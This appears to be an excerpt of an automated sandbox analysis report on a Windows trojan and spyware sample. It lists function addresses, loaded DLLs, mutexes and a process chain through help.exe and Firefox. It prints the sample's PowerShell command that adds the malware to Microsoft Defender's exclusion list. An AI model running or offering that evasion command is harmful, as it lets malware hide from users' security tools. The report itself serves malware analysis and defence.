Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157F0E0	9_2_0157F0E0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015770E9	9_2_015770E9
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014AD34C	9_2_014AD34C
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157132D	9_2_0157132D
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0150739A	9_2_0150739A
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014DB2C0	9_2_014DB2C0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015612ED	9_2_015612ED
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C52A0	9_2_014C52A0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01577571	9_2_01577571
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015895C3	9_2_015895C3
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0155D5B0	9_2_0155D5B0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014B1460	9_2_014B1460
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157F43F	9_2_0157F43F
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157F7B0	9_2_0157F7B0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01505630	9_2_01505630
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015716CC	9_2_015716CC
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C9950	9_2_014C9950
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014DB950	9_2_014DB950
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01555910	9_2_01555910
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0152D800	9_2_0152D800
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C38E0	9_2_014C38E0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157FB76	9_2_0157FB76
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01535BF0	9_2_01535BF0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014FDBF9	9_2_014FDBF9
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014DFB80	9_2_014DFB80
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01577A46	9_2_01577A46
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157FA49	9_2_0157FA49
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01533A6C	9_2_01533A6C
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0156DAC6	9_2_0156DAC6
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01505AA0	9_2_01505AA0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01561AA3	9_2_01561AA3
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0155DAAC	9_2_0155DAAC
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C3D40	9_2_014C3D40
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01571D5A	9_2_01571D5A
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01577D73	9_2_01577D73
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014DFDC0	9_2_014DFDC0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01539C32	9_2_01539C32
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157FCF2	9_2_0157FCF2
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157FF09	9_2_0157FF09
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01483FD2	9_2_01483FD2
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01483FD5	9_2_01483FD5
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C1F92	9_2_014C1F92
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157FFB1	9_2_0157FFB1
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C9EB0	9_2_014C9EB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313A352	12_2_0313A352
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031403E6	12_2_031403E6
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0308E3F0	12_2_0308E3F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03120274	12_2_03120274
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031002C0	12_2_031002C0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03070100	12_2_03070100
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0311A118	12_2_0311A118
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03108158	12_2_03108158
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031341A2	12_2_031341A2
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031401AA	12_2_031401AA
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031381CC	12_2_031381CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03112000	12_2_03112000
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030A4750	12_2_030A4750
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03080770	12_2_03080770
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0307C7C0	12_2_0307C7C0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0309C6E0	12_2_0309C6E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03080535	12_2_03080535
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03140591	12_2_03140591
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03124420	12_2_03124420
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03132446	12_2_03132446
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0312E4F6	12_2_0312E4F6
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313AB40	12_2_0313AB40
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03136BD7	12_2_03136BD7
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0307EA80	12_2_0307EA80
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03096962	12_2_03096962
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030829A0	12_2_030829A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0314A9A6	12_2_0314A9A6
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0308A840	12_2_0308A840
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03082840	12_2_03082840
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030668B8	12_2_030668B8
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030AE8F0	12_2_030AE8F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03122F30	12_2_03122F30
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030C2F28	12_2_030C2F28
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030A0F30	12_2_030A0F30
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030F4F40	12_2_030F4F40
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030FEFA0	12_2_030FEFA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03072FC8	12_2_03072FC8
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0308CFE0	12_2_0308CFE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313EE26	12_2_0313EE26
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03080E59	12_2_03080E59
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313CE93	12_2_0313CE93
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03092E90	12_2_03092E90
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313EEDB	12_2_0313EEDB
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0308AD00	12_2_0308AD00
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0311CD1F	12_2_0311CD1F
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03098DBF	12_2_03098DBF
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0307ADE0	12_2_0307ADE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03080C00	12_2_03080C00
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03120CB5	12_2_03120CB5
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03070CF2	12_2_03070CF2
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313132D	12_2_0313132D
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0306D34C	12_2_0306D34C
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030C739A	12_2_030C739A
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030852A0	12_2_030852A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0309B2C0	12_2_0309B2C0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031212ED	12_2_031212ED
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B516C	12_2_030B516C
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0306F172	12_2_0306F172
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0314B16B	12_2_0314B16B
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0308B1B0	12_2_0308B1B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030870C0	12_2_030870C0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0312F0CC	12_2_0312F0CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313F0E0	12_2_0313F0E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031370E9	12_2_031370E9
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313F7B0	12_2_0313F7B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030C5630	12_2_030C5630
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_031316CC	12_2_031316CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03137571	12_2_03137571
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0311D5B0	12_2_0311D5B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313F43F	12_2_0313F43F
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03071460	12_2_03071460
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313FB76	12_2_0313FB76
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0309FB80	12_2_0309FB80
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030BDBF9	12_2_030BDBF9
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030F5BF0	12_2_030F5BF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03137A46	12_2_03137A46
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313FA49	12_2_0313FA49
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030F3A6C	12_2_030F3A6C
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030C5AA0	12_2_030C5AA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03121AA3	12_2_03121AA3
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0311DAAC	12_2_0311DAAC
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0312DAC6	12_2_0312DAC6
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03115910	12_2_03115910
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03089950	12_2_03089950
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0309B950	12_2_0309B950
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030ED800	12_2_030ED800
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030838E0	12_2_030838E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313FF09	12_2_0313FF09
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03081F92	12_2_03081F92
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313FFB1	12_2_0313FFB1
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03089EB0	12_2_03089EB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03083D40	12_2_03083D40
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03131D5A	12_2_03131D5A
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_03137D73	12_2_03137D73
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0309FDC0	12_2_0309FDC0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030F9C32	12_2_030F9C32
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0313FCF2	12_2_0313FCF2
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02681B90	12_2_02681B90
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267CA20	12_2_0267CA20
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267CA17	12_2_0267CA17
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267CC40	12_2_0267CC40
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267AC20	12_2_0267AC20
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267AC16	12_2_0267AC16
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267AD65	12_2_0267AD65
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267AD70	12_2_0267AD70
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267ADB9	12_2_0267ADB9
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02685230	12_2_02685230
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_026710B4	12_2_026710B4
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02671131	12_2_02671131
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0269B720	12_2_0269B720
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02683430	12_2_02683430
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02F7E2F7	12_2_02F7E2F7
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02F85264	12_2_02F85264
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02F7E1D8	12_2_02F7E1D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02F7E68D	12_2_02F7E68D
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02F7D758	12_2_02F7D758
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02F7C9F8	12_2_02F7C9F8
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02F7C963	12_2_02F7C963

Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 0306B970 appears 280 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 030FF290 appears 105 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 030B5130 appears 58 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 030C7E54 appears 111 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 030EEA12 appears 86 times
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: String function: 0153F290 appears 105 times
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: String function: 01507E54 appears 111 times
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: String function: 014AB970 appears 280 times
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: String function: 014F5130 appears 58 times
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: String function: 0152EA12 appears 86 times

Source: AAHiVVNIKQESryT.exe, 00000004.00000002.1317132611.000000000089E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe, 00000004.00000002.1321747792.00000000025DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe, 00000004.00000002.1355745750.0000000008AE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe, 00000004.00000002.1333972354.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe, 00000004.00000002.1321747792.0000000002790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe, 00000009.00000002.1467764867.00000000011D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe, 00000009.00000002.1467764867.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe, 00000009.00000002.1468526331.00000000015AD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AAHiVVNIKQESryT.exe
Source: AAHiVVNIKQESryT.exe	Binary or memory string: OriginalFilenameBmQS.exe6 vs AAHiVVNIKQESryT.exe

Source: AAHiVVNIKQESryT.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: AAHiVVNIKQESryT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, h7ShcV770PyZ0AADup.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, h7ShcV770PyZ0AADup.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, rhL7Cp37IKU9FIO2K6.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, rhL7Cp37IKU9FIO2K6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, rhL7Cp37IKU9FIO2K6.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/7@16/12

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AAHiVVNIKQESryT.exe.log

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8384:120:WilError_03
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: unknown	Process created: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe"
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process created: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Process created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process created: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe"	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Process created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
